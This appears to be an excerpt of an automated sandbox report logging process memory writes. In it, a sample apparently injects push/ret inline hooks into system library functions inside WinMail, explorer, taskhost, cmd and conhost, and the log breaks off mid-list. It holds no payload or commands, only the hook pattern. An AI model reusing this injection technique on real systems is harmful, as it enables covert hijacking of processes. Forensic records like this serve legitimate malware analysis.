Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B53290 value: 68 E1 16 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76B3B010 value: 68 0D 17 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76873918 value: 68 DF BF 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76876F01 value: 68 17 C0 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76874406 value: 68 38 C0 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757A5C39 value: 68 4B 35 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757A476B value: 68 9B 35 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B507D value: 68 B9 35 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757ABB1C value: 68 FF 35 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D5BC1 value: 68 45 36 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757C71E4 value: 68 8B 36 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D152B value: 68 D1 36 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D25B7 value: 68 1A 37 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D150A value: 68 63 37 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D25DB value: 68 A9 37 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B1B3C value: 68 EF 37 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D2BD3 value: 68 38 38 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757AED4A value: 68 BD 38 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757ABC6A value: 68 0A 39 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B0162 value: 68 57 39 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757A6293 value: 68 A9 39 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B5D14 value: 68 FA F9 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B5D42 value: 68 6A FA 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B2D57 value: 68 AA FA 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B544C value: 68 05 FB 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B4AB7 value: 68 44 FB 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B5421 value: 68 83 FB 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757AA575 value: 68 C3 FB 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D1C07 value: 68 56 FC 85 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D6703 value: 68 B4 7D 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757AA4B3 value: 68 E6 7D 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757EC1B0 value: 68 2D 7E 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D6932 value: 68 6A 7E 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757D69F2 value: 68 C4 7E 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757A9DC7 value: 68 14 7F 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757BCDE8 value: 68 B3 7F 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B1899 value: 68 DB 7F 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B634A value: 68 03 80 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B19A5 value: 68 2E 80 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757B64C7 value: 68 FF 81 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 757C2BA7 value: 68 AE 83 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 753326E6 value: 68 A7 C2 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76887673 value: 68 80 BB 86 04 C3
Source: C:\Program Files\Windows Mail\WinMail.exe	Memory written: PID: 3580 base: 76874296 value: 68 F0 BB 86 04 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 772D57B8 value: 68 26 B8 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 772F22AE value: 68 4B B9 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 7704BC9A value: 68 73 BB 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 7703318E value: 68 B4 BB 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76762642 value: 68 1A BC 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 7672C532 value: 68 31 BC 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 7089441D value: 68 48 BC 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 70872EF2 value: 68 6F BC 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B38760 value: 68 6B 12 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B88740 value: 68 AF 12 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B3B4D0 value: 68 F3 12 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B82AF0 value: 68 48 13 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B73DB0 value: 68 9D 13 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76BFC790 value: 68 3A 14 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B2B470 value: 68 D7 14 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76BFC6D0 value: 68 22 15 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B33FA0 value: 68 6D 15 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B44FB0 value: 68 DA 15 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B60E10 value: 68 08 16 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B88470 value: 68 87 16 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B53290 value: 68 E1 16 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76B3B010 value: 68 0D 17 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76873918 value: 68 DF BF 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76876F01 value: 68 17 C0 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76874406 value: 68 38 C0 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757A5C39 value: 68 4B 35 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757A476B value: 68 9B 35 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B507D value: 68 B9 35 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757ABB1C value: 68 FF 35 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D5BC1 value: 68 45 36 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757C71E4 value: 68 8B 36 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D152B value: 68 D1 36 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D25B7 value: 68 1A 37 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D150A value: 68 63 37 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D25DB value: 68 A9 37 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B1B3C value: 68 EF 37 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D2BD3 value: 68 38 38 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757AED4A value: 68 BD 38 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757ABC6A value: 68 0A 39 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B0162 value: 68 57 39 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757A6293 value: 68 A9 39 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B5D14 value: 68 FA F9 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B5D42 value: 68 6A FA 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B2D57 value: 68 AA FA 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B544C value: 68 05 FB 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B4AB7 value: 68 44 FB 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B5421 value: 68 83 FB 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757AA575 value: 68 C3 FB 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D1C07 value: 68 56 FC 9A 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D6703 value: 68 B4 7D 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757AA4B3 value: 68 E6 7D 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757EC1B0 value: 68 2D 7E 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D6932 value: 68 6A 7E 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757D69F2 value: 68 C4 7E 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757A9DC7 value: 68 14 7F 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757BCDE8 value: 68 B3 7F 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B1899 value: 68 DB 7F 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B634A value: 68 03 80 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B19A5 value: 68 2E 80 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757B64C7 value: 68 FF 81 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 757C2BA7 value: 68 AE 83 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 753326E6 value: 68 A7 C2 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76887673 value: 68 80 BB 9B 02 C3
Source: C:\Windows\explorer.exe	Memory written: PID: 1236 base: 76874296 value: 68 F0 BB 9B 02 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 772D57B8 value: 68 26 B8 A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 772F22AE value: 68 4B B9 A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 7704BC9A value: 68 73 BB A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 7703318E value: 68 B4 BB A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76762642 value: 68 1A BC A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 7672C532 value: 68 31 BC A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 7089441D value: 68 48 BC A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 70872EF2 value: 68 6F BC A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B38760 value: 68 6B 12 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B88740 value: 68 AF 12 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B3B4D0 value: 68 F3 12 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B82AF0 value: 68 48 13 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B73DB0 value: 68 9D 13 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76BFC790 value: 68 3A 14 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B2B470 value: 68 D7 14 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76BFC6D0 value: 68 22 15 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B33FA0 value: 68 6D 15 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B44FB0 value: 68 DA 15 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B60E10 value: 68 08 16 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B88470 value: 68 87 16 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B53290 value: 68 E1 16 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76B3B010 value: 68 0D 17 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76873918 value: 68 DF BF A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76876F01 value: 68 17 C0 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76874406 value: 68 38 C0 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757A5C39 value: 68 4B 35 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757A476B value: 68 9B 35 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B507D value: 68 B9 35 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757ABB1C value: 68 FF 35 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D5BC1 value: 68 45 36 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757C71E4 value: 68 8B 36 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D152B value: 68 D1 36 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D25B7 value: 68 1A 37 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D150A value: 68 63 37 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D25DB value: 68 A9 37 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B1B3C value: 68 EF 37 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D2BD3 value: 68 38 38 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757AED4A value: 68 BD 38 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757ABC6A value: 68 0A 39 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B0162 value: 68 57 39 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757A6293 value: 68 A9 39 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B5D14 value: 68 FA F9 A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B5D42 value: 68 6A FA A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B2D57 value: 68 AA FA A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B544C value: 68 05 FB A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B4AB7 value: 68 44 FB A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B5421 value: 68 83 FB A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757AA575 value: 68 C3 FB A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D1C07 value: 68 56 FC A4 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D6703 value: 68 B4 7D A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757AA4B3 value: 68 E6 7D A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757EC1B0 value: 68 2D 7E A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D6932 value: 68 6A 7E A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757D69F2 value: 68 C4 7E A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757A9DC7 value: 68 14 7F A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757BCDE8 value: 68 B3 7F A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B1899 value: 68 DB 7F A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B634A value: 68 03 80 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B19A5 value: 68 2E 80 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757B64C7 value: 68 FF 81 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 757C2BA7 value: 68 AE 83 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 753326E6 value: 68 A7 C2 A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76887673 value: 68 80 BB A5 01 C3
Source: C:\Windows\System32\taskhost.exe	Memory written: PID: 1304 base: 76874296 value: 68 F0 BB A5 01 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 772D57B8 value: 68 26 B8 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 772F22AE value: 68 4B B9 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 7704BC9A value: 68 73 BB 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 7703318E value: 68 B4 BB 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76762642 value: 68 1A BC 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 7672C532 value: 68 31 BC 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 7089441D value: 68 48 BC 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 70872EF2 value: 68 6F BC 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B38760 value: 68 6B 12 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B88740 value: 68 AF 12 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B3B4D0 value: 68 F3 12 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B82AF0 value: 68 48 13 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B73DB0 value: 68 9D 13 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76BFC790 value: 68 3A 14 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B2B470 value: 68 D7 14 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76BFC6D0 value: 68 22 15 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B33FA0 value: 68 6D 15 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B44FB0 value: 68 DA 15 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B60E10 value: 68 08 16 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B88470 value: 68 87 16 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B53290 value: 68 E1 16 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76B3B010 value: 68 0D 17 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76873918 value: 68 DF BF 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76876F01 value: 68 17 C0 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76874406 value: 68 38 C0 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757A5C39 value: 68 4B 35 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757A476B value: 68 9B 35 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B507D value: 68 B9 35 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757ABB1C value: 68 FF 35 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D5BC1 value: 68 45 36 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757C71E4 value: 68 8B 36 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D152B value: 68 D1 36 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D25B7 value: 68 1A 37 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D150A value: 68 63 37 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D25DB value: 68 A9 37 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B1B3C value: 68 EF 37 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D2BD3 value: 68 38 38 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757AED4A value: 68 BD 38 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757ABC6A value: 68 0A 39 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B0162 value: 68 57 39 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757A6293 value: 68 A9 39 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B5D14 value: 68 FA F9 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B5D42 value: 68 6A FA 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B2D57 value: 68 AA FA 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B544C value: 68 05 FB 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B4AB7 value: 68 44 FB 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B5421 value: 68 83 FB 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757AA575 value: 68 C3 FB 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D1C07 value: 68 56 FC 03 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D6703 value: 68 B4 7D 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757AA4B3 value: 68 E6 7D 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757EC1B0 value: 68 2D 7E 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D6932 value: 68 6A 7E 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757D69F2 value: 68 C4 7E 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757A9DC7 value: 68 14 7F 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757BCDE8 value: 68 B3 7F 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B1899 value: 68 DB 7F 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B634A value: 68 03 80 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B19A5 value: 68 2E 80 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757B64C7 value: 68 FF 81 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 757C2BA7 value: 68 AE 83 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 753326E6 value: 68 A7 C2 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76887673 value: 68 80 BB 04 00 C3
Source: C:\Windows\System32\cmd.exe	Memory written: PID: 3992 base: 76874296 value: 68 F0 BB 04 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 772D57B8 value: 68 26 B8 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 772F22AE value: 68 4B B9 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 7704BC9A value: 68 73 BB 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 7703318E value: 68 B4 BB 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76762642 value: 68 1A BC 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 7672C532 value: 68 31 BC 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 7089441D value: 68 48 BC 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 70872EF2 value: 68 6F BC 1A 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B38760 value: 68 6B 12 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B88740 value: 68 AF 12 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B3B4D0 value: 68 F3 12 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B82AF0 value: 68 48 13 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B73DB0 value: 68 9D 13 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76BFC790 value: 68 3A 14 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B2B470 value: 68 D7 14 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76BFC6D0 value: 68 22 15 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B33FA0 value: 68 6D 15 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B44FB0 value: 68 DA 15 1B 00 C3
Source: C:\Windows\System32\conhost.exe	Memory written: PID: 3100 base: 76B60E10 value: 68 08 16 1B 00 C3
